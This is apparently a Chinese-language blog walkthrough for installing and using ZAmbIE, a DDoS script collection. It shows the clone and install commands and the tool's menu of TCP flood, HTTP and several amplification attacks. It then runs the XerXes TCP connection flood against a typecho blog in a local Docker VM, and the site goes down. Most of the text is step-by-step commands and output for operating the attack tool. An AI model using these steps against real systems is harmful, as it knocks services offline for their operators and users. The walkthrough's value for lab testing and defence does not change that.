项目主页:ZAmbIE
安装
git clone https://github.com/zanyarjamal/zambie.git
chmod -R 777 zambie
cd zambie
./Installer.sh
./zambie.py
启动如果出现报错moudle termcolor not found
执行
pip install termcolor
运行
./zambie.py
___________________________________________________________________
| |
| /$$$$$$$$ /$$$$$$ /$$ /$$$$$$ /$$$$$$$$ |
| |_____ $$ /$$__ $$ | $$ |_ $$_/| $$_____/ |
| /$$/ | $$ \ $$ /$$$$$$/$$$$ | $$$$$$$ | $$ | $$ |
| /$$/ | $$$$$$$$| $$_ $$_ $$| $$__ $$ | $$ | $$$$$ |
| /$$/ | $$ | $$| $$ \ $$ \ $$| $$ \ $$ | $$ | $$__/ |
| /$$/ | $$ | $$| $$ | $$ | $$| $$ | $$ | $$ | $$ |
| /$$$$$$$$| $$ | $$| $$ | $$ | $$| $$$$$$$//$$$$$$| $$$$$$$$ |
| |________/|__/ |__/|__/ |__/ |__/|_______/|______/|________/ |
| V1.O |
|______________________[MADE BY LUNATI[C2]]_________________________|
1:. DDoS Attacks
99:. Quit
$:
输入1
回车进行DDos攻击
| /$$$$$$$ /$$$$$$$ Layer[4/7] /$$$$$$ |
-------| | $$__ $$| $$__ $$ /$$__ $$ |-------
| | $$ \ $$| $$ \ $$ /$$$$$$ | $$ \__/ |
| | $$ | $$| $$ | $$ /$$__ $$| $$$$$$ |
-------| | $$ | $$| $$ | $$| $$ \ $$ \____ $$ |-------
| | $$ | $$| $$ | $$| $$ | $$ /$$ \ $$ |
| | $$$$$$$/| $$$$$$$/| $$$$$$/| $$$$$$/ |
-------| |_______/ |_______/ \______/ \______/ |-------
|____________[DDoS Script Collection]____________|
1:. TCP Connection Flood
2:. HTTP Attacks
3:. NTP AMP Attack
4:. DNS AMP Attack
5:. SSDP AMP Attack
6:. DOMINATE
7:. CHARGEN AMP Attacks
8:. SUDP AMP Attack
9:. QUAKE AMP Attacks
10:. TS3 AMP Attacks
99:. Go Back
$:
有10种不同的攻击方式
测试TCP洪水攻击
目标为虚拟机中docker搭建的typecho博客
终端输入1
选择TCP Connection Flood
1:. XerXes
99:. Go Back
$:
然后输入1
选择XerXes
(薛西斯大帝?)
| /$$ /$$ /$$$$$$ /$$$$$$ /$$ /$$ /$$$$$$ /$$$$$$$ |
| | $$ /$$/ /$$__ $$ /$$__ $$| $$ /$$/ /$$__ $$ /$$_____/ |
| \ $$$$/ | $$$$$$$$| $$ \__/ \ $$$$/ | $$$$$$$$| $$$$$$ |
| >$$ $$ | $$_____/| $$ >$$ $$ | $$_____/ \____ $$ |
| /$$/\ $$| $$$$$$$| $$ /$$/\ $$| $$$$$$$ /$$$$$$$/ |
| |__/ \__/ \_______/|__/ |__/ \__/ \_______/|_______/ |
|_________________________________________________________________|
______________________{IT CAN DO THE TRICK}______________________
Domain: 192.168.114.132
Port: 8080
设置目标ip/域名和端口
回车启动攻击
访问网站已经down了
服务器执行netstat -ant
可见建立大量链接